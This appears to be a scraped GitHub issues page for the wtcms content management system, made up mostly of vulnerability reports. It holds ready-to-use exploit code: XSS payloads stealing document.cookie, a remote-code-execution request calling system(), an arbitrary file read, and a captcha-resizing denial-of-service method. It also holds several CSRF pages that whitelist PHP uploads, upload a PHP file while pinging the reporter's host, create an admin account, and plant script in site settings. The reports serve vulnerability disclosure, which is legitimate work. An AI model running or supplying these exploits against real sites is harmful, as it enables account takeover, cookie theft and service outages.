taosir / wtcms Goto Github PK
View Code? Open in Web Editor NEW基于thinkphp的内容管理系统,可快速搭建个人博客、公司学校官网、新闻类站点。
License: GNU Lesser General Public License v3.0
基于thinkphp的内容管理系统,可快速搭建个人博客、公司学校官网、新闻类站点。
License: GNU Lesser General Public License v3.0
Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
<input type="hidden" name="start_time" value="" />
<input type="hidden" name="end_time" value="" />
<input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
wtcms is based on thinkcmf,but there is a RCE vulnerability has been exposed about thinkcmf in October(detail:https://www.freebuf.com/vuls/218105.html)。An attacker can execute any command by requesting ?a=fetch&content=<?php system('ping xxxxxx');?>
To demonstrate this vulnerability, we reproduce it via dnslog
after sending request above, we can get some dns query record on dnslog platform
besides, we can read any file by sending a request ?a=display&templateFile=README.md
we can change the value of templateFile
to read any file.
按要求配置完毕一直是页面不存在
1.Right click to view the verification code image address
2.Found width and height in the url
3.Use burpsuite to fetch data and see the size of the returned package
4.Try modifying the length and width values and seeing the size of the returned package
5.Through the above test, we know that the vulnerability exists. If we send a 10000 packet to the server and the server takes 10s to process, then if we send 10 10000 packets?
10x10 = 100s
That is, the server takes 100s to process. When we send 100 such packets (of course, you should never throw them with 100 packets. Generally speaking, 20-50 test results can lead to website crashes.)
javascript:alert(document.cookie)
Find the published article in the front desk and click on the link to trigger XSS
javascript:alert(document.cookie)
Find the location where the XSS code is inserted in the foreground and click to trigger the XSS attack
javascript:alert(document.cookie)
Find the link address at the bottom of the front desk and click to trigger XSS
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<script type="text/javascript">
function post(url, fields) {
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack() {
var fields;
fields += "<input type='hidden' name='image[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='image[extensions]' value='=jpg,jpeg,png,gif,bmp4,php' />";
fields += "<input type='hidden' name='video[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='audio[upload_max_filesize%5' value='10240' />";
fields += "<input type='hidden' name='file[upload_max_filesize]' value='10240' />";
fields += "<input type='hidden' name='video[extensions]' value='mp4,avi,wmv,rm,rmvb,mkv' />";
fields += "<input type='hidden' name='audio[extensions]' value='mp3,wma,wav' />";
fields += "<input type='hidden' name='file[extensions]' value='txt,pdf,doc,docx,xls,xlsx,ppt,pptx,zip,rar' />";
var url = "http://192.168.1.2/index.php?g=admin&m=setting&a=upload_post";
post(url, fields);
}
window.onload = function () {
csrf_hack();
}
</script>
</body>
</html>
The above script can use the csrf to add a file with the suffix php in the whitelist of the uploaded image.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest() {
var xhr1 = new XMLHttpRequest();
xhr1.open('GET', "http://127.0.0.1:5000/?timestamp=" + (new Date()).valueOf(), true);
xhr1.send(null);
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.1.2\/index.php?g=asset&m=asset&a=plupload", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------128712298613561");
xhr.withCredentials = true;
var body = "-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"name\"\r\n" +
"\r\n" +
"abc.php\r\n" +
"-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"app\"\r\n" +
"\r\n" +
"Admin\r\n" +
"-----------------------------128712298613561\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"abc.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php phpinfo();?\x3e\r\n" +
"-----------------------------128712298613561--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.onload = submitRequest();
</script>
</body>
</html>
In the above script, before uploading the php file, the script trigger timestamp will be sent to my host, let me know the script trigger time (prepare for the subsequent blast file name), followed by uploading a file, the content is obtained. Phpinfo();
After two hours of attack, I received the following good news.
After the administrator logs in, open the CSRF exp page.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?g=admin&m=user&a=add_post" method="POST">
<input type="hidden" name="user_login" value="hacker1" />
<input type="hidden" name="user_pass" value="hacker1" />
<input type="hidden" name="user_email" value="123@qq.com" />
<input type="hidden" name="role_id[]" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflective XSS exists in keyword search area managed by administrator background articles
url:http://xxx.xxx.xxx/index.php?g=admin&m=index&a=index
"><img/src=1 onerror=alert(document.cookie)><a src="
Place of backstage set up website information exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the site information is automatically changed.
There is still an xss in the place of the website statistics code.
We can write an xss first, and then construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the administrator visits the homepage of the website, he can get him Cookie
CSRF Exp:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wtcms/index.php?g=admin&m=setting&a=site_post" method="POST">
<input type="hidden" name="options[site_name]" value="test" />
<input type="hidden" name="option_id" value="10" />
<input type="hidden" name="options[site_admin_url_password]" value="" />
<input type="hidden" name="options[site_tpl]" value="default" />
<input type="hidden" name="options[site_adminstyle]" value="flat" />
<input type="hidden" name="options[site_icp]" value="" />
<input type="hidden" name="options[site_admin_email]" value="" />
<input type="hidden" name="options[site_tongji]" value="<script>alert("test")</script>" />
<input type="hidden" name="options[site_copyright]" value="" />
<input type="hidden" name="options[site_seo_title]" value="�¿½�¸�»�¿½�¡�¿½" />
<input type="hidden" name="options[site_seo_keywords]" value="" />
<input type="hidden" name="options[site_seo_description]" value="" />
<input type="hidden" name="options[urlmode]" value="0" />
<input type="hidden" name="options[html_suffix]" value="" />
<input type="hidden" name="options[comment_time_interval]" value="60" />
<input type="hidden" name="cmf_settings[banned_usernames]" value="" />
<input type="hidden" name="cdn_settings[cdn_static_root]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
You can add articles in admin background, but there is a CSRF vulnerability.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST">
<input type="hidden" name="cid" value="3" />
<input type="hidden" name="parentid" value="72" />
<input type="hidden" name="label" value="CSRF Test" />
<input type="hidden" name="nav" value="on" />
<input type="hidden" name="external_href" value="http://" />
<input type="hidden" name="target" value="" />
<input type="hidden" name="icon" value="" />
<input type="hidden" name="status" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.